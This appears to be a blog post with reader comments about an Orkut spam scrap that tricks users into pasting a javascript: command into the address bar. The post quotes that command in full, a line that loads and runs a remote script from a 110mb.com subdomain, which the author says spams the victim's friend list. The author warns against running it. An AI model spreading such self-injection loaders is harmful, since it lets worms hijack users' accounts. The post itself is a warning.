Now a days, I am getting some spam scraps as the following.
Hey..One girl is about u.. also written about u in her ABOUT ME..And she added Your profile link and some of ur photos also...in her Profile..
Her profile link..
http://www.orkut.com/Profile.aspx?uid=16225293724851058484
I saw Your pics from her Profile..Super..Reply
When you will click on the profile link, it will open that persons profile and in about me you can find some message as following.
To see soMe of my friend pics....many are there[Cant write here]
Clear ur address bar..copy paste.. Below Script To See This Person's Picture:-
javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://picsfriends565.110mb.com/gudfoto.js';void(0)
I always avoid this and delete the scrap from my scrapbook as I know this is nothing but a attempt to have SQL or Script injection or Session Hijacking script. I am interested to see the JavaScript code and analyze it and to determine, what is the script doing. But, due to lack of time I say I will do it later. But today how ever I looked at one script. From this I understand that, the script is using popular web 2.0 technology Ajax, and let me explain what it does.
First it collects your friend list and sends that scrap to all and then displays some text about sql injection and ethical hacking. And with this it also displays your friends profile photos. My system is now crashing frequently. I hope this will be fixed in this week. After that I will play with all these scripts and post in detail. I promise that I will also help you to play with me.
And be careful, never run such scripts on your address bar. If you want to ask anything you can post here, I will reply.
Subscribe my Shared items
6 comments:
bu its safe or not
Hi, Gargi. Thanks for your question/comment.
Well, after running this script on your browser address bar, you have to wait some time to see what happens. Here according to my knowledge and analysis, you will see one description of sql injections with one related Orkut community in that page with your friends photos. And particularly for this code, I did not find any hijacking code. It may not be unsafe, but why need you to do so?
Once again, I warn you to not to run such scripts on your browser address bar. If you have got another script, please let me know, I will find time to analyze this.
Update News:
The specific URL of that JavaScript is not available now on the sever now. That sub domain picsfriends565 of 110mb.com is also deleted. I have not copied the script and I lost this script to analyze and play with it. If anyone of you have this script, please email me.
i have recieved same message as typed by u..my frnd has send it 2 me but i dont know d person in whos ABOUT ME my profile is added...wat shud i do..???
Hi Geetika, Thanks for your question/comment.
Your friend has not sent you anything. He/she has just ran the script on his/her browser. So you get that scrap automatically.
Your profile has not added in that about me of that person. This is only a trick. If I will click on the link, I will see my profile. So need not to be worry. Please see my latest post on this.
Saw link to your profile in Orkut in an unknown's profile?.
You are welcome to ask me anything. You can email or post here in comments.
Recent Update:
Today I noticed that, in that profile, the url of the script got changed. Now the path to the script is http://coolpics98.110mb.com/gudfoto.js
If you have any question please ask here or email me.
Post a Comment